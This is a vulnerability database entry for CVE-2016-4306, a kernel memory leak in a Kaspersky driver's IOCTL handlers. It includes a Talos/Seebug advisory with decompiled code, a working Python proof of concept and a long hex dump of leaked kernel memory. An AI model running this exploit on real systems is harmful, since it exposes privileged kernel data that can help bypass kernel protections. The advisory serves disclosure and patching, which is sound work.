Vulnerabilities > CVE-2016-4306 - Information Exposure vulnerability in Kaspersky Total Security 16.0.0.614
Attack vector
LOCAL Attack complexity
LOW Privileges required
LOW Confidentiality impact
HIGH Integrity impact
NONE Availability impact
NONE Summary
Multiple information leaks exist in various IOCTL handlers of the Kaspersky Internet Security KLDISK driver. Specially crafted IOCTL requests can cause the driver to return out-of-bounds kernel memory, potentially leaking sensitive information such as privileged tokens or kernel memory addresses that may be useful in bypassing kernel mitigations. An unprivileged user can run a program from user-mode to trigger this vulnerability.
Vulnerable Configurations
Part | Description | Count |
---|---|---|
Application | 1 |
Common Weakness Enumeration (CWE)
Common Attack Pattern Enumeration and Classification (CAPEC)
- Subverting Environment Variable Values The attacker directly or indirectly modifies environment variables used by or controlling the target software. The attacker's goal is to cause the target software to deviate from its expected operation in a manner that benefits the attacker.
- Footprinting An attacker engages in probing and exploration activity to identify constituents and properties of the target. Footprinting is a general term to describe a variety of information gathering techniques, often used by attackers in preparation for some attack. It consists of using tools to learn as much as possible about the composition, configuration, and security mechanisms of the targeted application, system or network. Information that might be collected during a footprinting effort could include open ports, applications and their versions, network topology, and similar information. While footprinting is not intended to be damaging (although certain activities, such as network scans, can sometimes cause disruptions to vulnerable applications inadvertently) it may often pave the way for more damaging attacks.
- Exploiting Trust in Client (aka Make the Client Invisible) An attack of this type exploits a programs' vulnerabilities in client/server communication channel authentication and data integrity. It leverages the implicit trust a server places in the client, or more importantly, that which the server believes is the client. An attacker executes this type of attack by placing themselves in the communication channel between client and server such that communication directly to the server is possible where the server believes it is communicating only with a valid client. There are numerous variations of this type of attack.
- Browser Fingerprinting An attacker carefully crafts small snippets of Java Script to efficiently detect the type of browser the potential victim is using. Many web-based attacks need prior knowledge of the web browser including the version of browser to ensure successful exploitation of a vulnerability. Having this knowledge allows an attacker to target the victim with attacks that specifically exploit known or zero day weaknesses in the type and version of the browser used by the victim. Automating this process via Java Script as a part of the same delivery system used to exploit the browser is considered more efficient as the attacker can supply a browser fingerprinting method and integrate it with exploit code, all contained in Java Script and in response to the same web page request by the browser.
- Session Credential Falsification through Prediction This attack targets predictable session ID in order to gain privileges. The attacker can predict the session ID used during a transaction to perform spoofing and session hijacking.
Seebug
bulletinFamily | exploit |
description | ### Summary Multiple information leaks exist in various IOCTL handlers of the Kaspersky Internet Security KLDISK driver. Specially crafted IOCTL requests can cause the driver to return out of bounds kernel memory, potentially leaking sensitive information such as privileged tokens or kernel memory addresses that may be useful in bypassing kernel mitigations. An unprivileged user can run a program from user mode to trigger this vulnerability. ``` Because of used transfer type : METHOD_BUFFERED for in/out buffer and wrongly set value of output buffer len to IoStatus.Information ``` it leads to leak of kernel memory to userland. ### Tested Versions Kaspersky Total Security 16.0.0.614 ### Product URLs http://www.kaspersky.com/ ### Details This vulnerability can be triggered by sending IOCTL requests to the KlDiskCtl device. Here we show the default access control on the device allow any user on the system to send IOCTL requests: ``` accesschk.exe -q -o \Device\KlDiskCtl \Device\KlDiskCtl Type: Device RW NT AUTHORITY\SYSTEM RW BUILTIN\Administrators RW Everyone ``` Multiple privileged memory disclosure vulnerabilities exist specifically in the way certain IOCTL handlers misuse buffered transfers. We can identify IOCTls using buffered transfers by looking for the METHOD_BUFFERED property: ``` WinIoCtlDecoder.py 0x8123e044 Device : <UNKNOWN> (0x8123) Function : 0x811 Method : METHOD_BUFFERED (0) Access : FILE_READ_ACCESS | FILE_WRITE_ACCESS (3) ``` These vulnerabilities are strictly related with this specific transfer type and how the output buffer length information is set at the end of the IOCTL handler function. Analysis of an example vulnerable IOCTL handler at 0x8123e048 follows: ``` 1 if ( v7 == 0x8123E048 ) 2 { 3 ptrUserBuff = Irp->AssociatedIrp.SystemBuffer; 4 (...) 5 v33 = ioStackLocation->Parameters.DeviceIoControl.InputBufferLength; 6 v11 = v33 < 0x14; 7 OutputBufferLength = 0x14; 8 if ( v11 ) 9 { 10 if ( v32 == &DeviceObject || !(v32->Characteristics & 1) || BYTE1(v32->Flags) < 2u ) 11 goto LABEL_120; 12 v77 = 0x14; 13 v74 = NewIrql; 14 v71 = &unk_92F411C0; 15 v68 = 56; 16 goto LABEL_265; 17 } 18 OutputBufferLength = ioStackLocation->Parameters.DeviceIoControl.OutputBufferLength; 19 *(ptrUserBuff + 2) = 0; 20 *(ptrUserBuff + 1) = sub_92F403CA(ptrUserBuff_2, &OutputBufferLength); 21 mem_leak_return: 22 irp->IoStatus.Information = OutputBufferLength; 23 return v13; 24 25 26 (...) 27 28 signed int __stdcall sub_92F403CA(PBYTE inBuff, PDWORD outBuffLen) 29 { 30 struct_v2 *v2; // edi@1 31 signed int v3; // esi@2 32 unsigned int v4; // eax@3 33 KIRQL v5; // bl@6 34 35 v2 = checkOnList(*inBuff); 36 if ( v2 ) 37 { 38 v4 = *(inBuff + 4); 39 if ( v4 > v2->dwordC4 || *outBuffLen < v4 + 0x14 ) 40 { 41 v3 = 0xC000000D; 42 } 43 else 44 { 45 v5 = KfAcquireSpinLock(&v2->kspin_lock20A4); 46 memcpy(inBuff + 0x14, &v2->gap4[v2->dwordCC + 160], *(inBuff + 4)); 47 KfReleaseSpinLock(&v2->kspin_lock20A4, v5); 48 v3 = 0; 49 *outBuffLen = *(inBuff + 4) + 20; 50 } 51 removeFromList(&v2->single_list_entry0); 52 } 53 else 54 { 55 v3 = 0xC0000225; 56 } 57 return v3; 58 } ``` In Line 7 we see that OutputBufferLength is set to 0x14 but in Line 18 again assigned a value from parameters passed by user. Line 20 makes a call to a function to which OutputBufferLength is passed as parameter and set by the underlying function based upon the return buffer size. The vulnerability appears when the condition on line 36 is not met. In this case, the function won't assign outBuffLen on line 49. Since the value is not replaced in the underlying function, on line 22 to IoStatus.Information field which indicates how many bytes is returned in output buffer to user mode is set based on fully controllable user input resulting in arbitrary amount of memory leaked from kernel to userspace. The vulnerability exists during handling the following IOCTLs: ``` 0x8123e048 0x8123e05c 0x8123e060 ``` ### Proof of Concept Python code to trigger the memory disclosure: ``` import win32file import win32con def leak_memory(): fileName = u'\\\\.\\KlDiskCtl' hFile = win32file.CreateFileW(fileName, win32con.GENERIC_READ |win32con.GENERIC_WRITE, 0, None, win32con.OPEN_EXISTING, 0 , None, 0) print "Handle ready : ",repr(hFile) ioctl = 0x8123e048 inputBuffer = "A"*0x14 inputBufferLen = len(inputBuffer) outBufferLen = 0x1000 print "Time to send IOCTL : 0x%x" % ioctl buf = win32file.DeviceIoControl(hFile, ioctl,inputBuffer,outBufferLen) buf = buf[inputBufferLen:] with file('outBuff.bin','wb') as f: f.write(buf) if __name__ == "__main__": leak_memory() ``` ### Example output: ``` python ioctl.py Handle ready : <PyHANDLE:112> Time to send IOCTL : 0x8123e048 content of outBuff.bin (...) Offset 0 1 2 3 4 5 6 7 8 9 A B C D E F 00000000 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 00000010 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 00000020 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 00000030 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 00000040 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 00000050 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 00000060 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 00000070 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 00000080 00 00 00 00 00 00 00 00 06 00 00 00 02 00 00 00 ................ 00000090 00 00 00 00 01 00 00 00 05 98 22 F3 9E 86 9E 47 ........."󞆞G 000000A0 BA 76 DD 64 3F 1D 1B 80 00 00 00 00 00 00 00 00 şvÝd?..€........ 000000B0 00 00 00 00 00 00 00 00 07 00 00 00 3C 00 57 00 ............<.W. 000000C0 41 00 4E 00 20 00 4D 00 69 00 6E 00 69 00 70 00 A.N. .M.i.n.i.p. 000000D0 6F 00 72 00 74 00 20 00 28 00 4E 00 65 00 74 00 o.r.t. .(.N.e.t. 000000E0 77 00 6F 00 72 00 6B 00 20 00 4D 00 6F 00 6E 00 w.o.r.k. .M.o.n. 000000F0 69 00 74 00 6F 00 72 00 29 00 00 00 00 00 00 00 i.t.o.r.)....... 00000100 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 00000110 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 00000120 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 00000130 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 00000140 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 00000150 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 00000160 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 00000170 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 00000180 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 00000190 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 000001A0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 000001B0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 000001C0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 000001D0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 000001E0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 000001F0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 00000200 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 00000210 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 00000220 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 00000230 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 00000240 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 00000250 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 00000260 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 00000270 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 00000280 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 00000290 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 000002A0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 000002B0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 000002C0 06 00 00 00 02 00 00 00 00 00 00 00 01 00 00 00 ................ 000002D0 A9 97 DD 72 44 E5 15 49 88 D8 44 E8 29 C3 4F 68 ©—ÝrDĺ.IŘDč)ĂOh 000002E0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 000002F0 0E 00 00 00 90 00 49 00 6E 00 74 00 65 00 6C 00 .....I.n.t.e.l. 00000300 28 00 52 00 29 00 20 00 50 00 52 00 4F 00 2F 00 (.R.). .P.R.O./. 00000310 31 00 30 00 30 00 30 00 20 00 4D 00 54 00 20 00 1.0.0.0. .M.T. . 00000320 4E 00 65 00 74 00 77 00 6F 00 72 00 6B 00 20 00 N.e.t.w.o.r.k. . 00000330 43 00 6F 00 6E 00 6E 00 65 00 63 00 74 00 69 00 C.o.n.n.e.c.t.i. 00000340 6F 00 6E 00 2D 00 4B 00 61 00 73 00 70 00 65 00 o.n.-.K.a.s.p.e. 00000350 72 00 73 00 6B 00 79 00 20 00 4C 00 61 00 62 00 r.s.k.y. .L.a.b. 00000360 20 00 4E 00 44 00 49 00 53 00 20 00 36 00 20 00 .N.D.I.S. .6. . 00000370 46 00 69 00 6C 00 74 00 65 00 72 00 2D 00 30 00 F.i.l.t.e.r.-.0. 00000380 30 00 30 00 30 00 00 00 00 00 00 00 00 00 00 00 0.0.0........... 00000390 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 000003A0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 000003B0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 000003C0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 000003D0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 000003E0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 000003F0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 00000400 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 00000410 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 00000420 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 00000430 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 00000440 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 00000450 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 00000460 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 00000470 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 00000480 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 00000490 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 000004A0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 000004B0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 000004C0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 000004D0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 000004E0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 000004F0 00 00 00 00 00 00 00 00 06 00 00 00 02 00 00 00 ................ 00000500 00 00 00 00 01 00 00 00 1D 24 97 EB 04 35 E5 11 .........$—ë.5ĺ. 00000510 9F 87 00 0C 29 8A F2 9D 00 00 00 00 02 00 00 00 ź‡..)Šňť........ 00000520 00 00 00 00 0E 00 00 00 0F 00 00 00 82 00 49 00 ............‚.I. 00000530 6E 00 74 00 65 00 6C 00 28 00 52 00 29 00 20 00 n.t.e.l.(.R.). . 00000540 50 00 52 00 4F 00 2F 00 31 00 30 00 30 00 30 00 P.R.O./.1.0.0.0. 00000550 20 00 4D 00 54 00 20 00 4E 00 65 00 74 00 77 00 .M.T. .N.e.t.w. 00000560 6F 00 72 00 6B 00 20 00 43 00 6F 00 6E 00 6E 00 o.r.k. .C.o.n.n. 00000570 65 00 63 00 74 00 69 00 6F 00 6E 00 2D 00 51 00 e.c.t.i.o.n.-.Q. 00000580 6F 00 53 00 20 00 50 00 61 00 63 00 6B 00 65 00 o.S. .P.a.c.k.e. 00000590 74 00 20 00 53 00 63 00 68 00 65 00 64 00 75 00 t. .S.c.h.e.d.u. 000005A0 6C 00 65 00 72 00 2D 00 30 00 30 00 30 00 30 00 l.e.r.-.0.0.0.0. 000005B0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 000005C0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 000005D0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 000005E0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 000005F0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 00000600 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 00000610 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 00000620 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 00000630 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 00000640 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 00000650 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 00000660 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 00000670 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 00000680 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 00000690 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 000006A0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 000006B0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 000006C0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 000006D0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 000006E0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 000006F0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 00000700 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 00000710 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 00000720 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 00000730 06 00 00 00 02 00 00 00 00 00 00 00 01 00 00 00 ................ 00000740 9E 89 68 4C 4F 35 E5 11 87 E0 CC 79 3C D0 D5 13 ž‰hLO5ĺ.‡ŕĚy<ĐŐ. 00000750 00 00 00 00 02 00 00 00 00 00 00 00 0E 00 00 00 ................ 00000760 08 00 00 00 22 00 57 00 41 00 4E 00 20 00 4D 00 ....".W.A.N. .M. 00000770 69 00 6E 00 69 00 70 00 6F 00 72 00 74 00 20 00 i.n.i.p.o.r.t. . 00000780 28 00 49 00 50 00 29 00 00 00 00 00 00 00 00 00 (.I.P.)......... 00000790 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 000007A0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 000007B0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 000007C0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 000007D0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 000007E0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 000007F0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 00000800 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 00000810 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 00000820 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 00000830 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 00000840 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 00000850 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 00000860 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 00000870 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 00000880 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 00000890 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 000008A0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 000008B0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 000008C0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 000008D0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 000008E0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 000008F0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 00000900 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 00000910 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 00000920 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 00000930 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 00000940 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 00000950 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 00000960 00 00 00 00 00 00 00 00 06 00 00 00 02 00 00 00 ................ 00000970 00 00 00 00 01 00 00 00 F0 53 56 7C 4A 14 34 45 ........đSV|J.4E 00000980 9E 34 28 AC 99 CB A8 5E 00 00 00 00 00 00 00 00 ž4(¬™Ë¨^........ 00000990 00 00 00 00 00 00 00 00 10 00 00 00 86 00 49 00 ............†.I. 000009A0 6E 00 74 00 65 00 6C 00 28 00 52 00 29 00 20 00 n.t.e.l.(.R.). . 000009B0 50 00 52 00 4F 00 2F 00 31 00 30 00 30 00 30 00 P.R.O./.1.0.0.0. 000009C0 20 00 4D 00 54 00 20 00 4E 00 65 00 74 00 77 00 .M.T. .N.e.t.w. 000009D0 6F 00 72 00 6B 00 20 00 43 00 6F 00 6E 00 6E 00 o.r.k. .C.o.n.n. 000009E0 65 00 63 00 74 00 69 00 6F 00 6E 00 2D 00 57 00 e.c.t.i.o.n.-.W. 000009F0 46 00 50 00 20 00 4C 00 69 00 67 00 68 00 74 00 F.P. .L.i.g.h.t. 00000A00 57 00 65 00 69 00 67 00 68 00 74 00 20 00 46 00 W.e.i.g.h.t. .F. 00000A10 69 00 6C 00 74 00 65 00 72 00 2D 00 30 00 30 00 i.l.t.e.r.-.0.0. 00000A20 30 00 30 00 00 00 00 00 00 00 00 00 00 00 00 00 0.0............. 00000A30 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 00000A40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 00000A50 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 00000A60 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 00000A70 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 00000A80 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 00000A90 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 00000AA0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 00000AB0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 00000AC0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 00000AD0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 00000AE0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 00000AF0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 00000B00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 00000B10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 00000B20 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 00000B30 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 00000B40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 00000B50 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 00000B60 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 00000B70 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 00000B80 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 00000B90 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 00000BA0 06 00 00 00 02 00 00 00 00 00 00 00 01 00 00 00 ................ 00000BB0 9F 89 68 4C 4F 35 E5 11 87 E0 CC 79 3C D0 D5 13 ź‰hLO5ĺ.‡ŕĚy<ĐŐ. 00000BC0 00 00 00 00 02 00 00 00 00 00 00 00 0E 00 00 00 ................ 00000BD0 0B 00 00 00 4E 00 49 00 6E 00 74 00 65 00 6C 00 ....N.I.n.t.e.l. 00000BE0 28 00 52 00 29 00 20 00 50 00 52 00 4F 00 2F 00 (.R.). .P.R.O./. 00000BF0 31 00 30 00 30 00 30 00 20 00 4D 00 54 00 20 00 1.0.0.0. .M.T. . 00000C00 4E 00 65 00 74 00 77 00 6F 00 72 00 6B 00 20 00 N.e.t.w.o.r.k. . 00000C10 43 00 6F 00 6E 00 6E 00 65 00 63 00 74 00 69 00 C.o.n.n.e.c.t.i. 00000C20 6F 00 6E 00 00 00 00 00 00 00 00 00 00 00 00 00 o.n............. 00000C30 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 00000C40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 00000C50 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 00000C60 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 00000C70 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 00000C80 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 00000C90 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 00000CA0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 00000CB0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 00000CC0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 00000CD0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 00000CE0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 00000CF0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 00000D00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 00000D10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 00000D20 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 00000D30 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 00000D40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 00000D50 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 00000D60 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 00000D70 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 00000D80 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 00000D90 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 00000DA0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 00000DB0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 00000DC0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 00000DD0 00 00 00 00 00 00 00 00 06 00 00 00 02 00 00 00 ................ 00000DE0 00 00 00 00 01 00 00 00 54 8E 10 67 14 7D 9E 4D ........TŽ.g.}žM 00000DF0 A2 BF F2 76 14 C8 DB 72 01 00 00 00 01 00 00 00 ˘żňv.ČŰr........ 00000E00 00 00 00 00 0E 00 00 00 11 00 00 00 68 00 57 00 ............h.W. 00000E10 41 00 4E 00 20 00 4D 00 69 00 6E 00 69 00 70 00 A.N. .M.i.n.i.p. 00000E20 6F 00 72 00 74 00 20 00 28 00 49 00 50 00 76 00 o.r.t. .(.I.P.v. 00000E30 36 00 29 00 2D 00 4B 00 61 00 73 00 70 00 65 00 6.).-.K.a.s.p.e. 00000E40 72 00 73 00 6B 00 79 00 20 00 4C 00 61 00 62 00 r.s.k.y. .L.a.b. 00000E50 20 00 4E 00 44 00 49 00 53 00 20 00 36 00 20 00 .N.D.I.S. .6. . 00000E60 46 00 69 00 6C 00 74 00 65 00 72 00 2D 00 30 00 F.i.l.t.e.r.-.0. 00000E70 30 00 30 00 30 00 00 00 00 00 00 00 00 00 00 00 0.0.0........... 00000E80 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 00000E90 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 00000EA0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 00000EB0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 00000EC0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 00000ED0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 00000EE0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 00000EF0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 00000F00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 00000F10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 00000F20 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 00000F30 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 00000F40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 00000F50 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 00000F60 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 00000F70 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 00000F80 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 00000F90 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 00000FA0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 00000FB0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 00000FC0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 00000FD0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 00000FE0 00 00 00 00 00 00 00 00 00 00 00 00 ............ ``` ### Mitigation If possible we recommend a more strict access control on accessing the affected device as well as fixing the code path leading to user control over IoStatus.Information. ### Timeline * 2016-04-29 - Vendor Notification * 2016-08-26 – Patch Released * 2016-08-26 – Public Disclosure |
id | SSV:96678 |
last seen | 2017-11-19 |
modified | 2017-10-13 |
published | 2017-10-13 |
reporter | Root |
source | https://www.seebug.org/vuldb/ssvid-96678 |
title | Kaspersky Internet Security KLDISK Driver Multiple Kernel Memory Disclosure Vulnerabilities(CVE-2016-4306) |
Talos
id | TALOS-2016-0168 |
last seen | 2019-05-29 |
published | 2016-08-26 |
reporter | Talos Intelligence |
source | http://www.talosintelligence.com/vulnerability_reports/TALOS-2016-0168 |
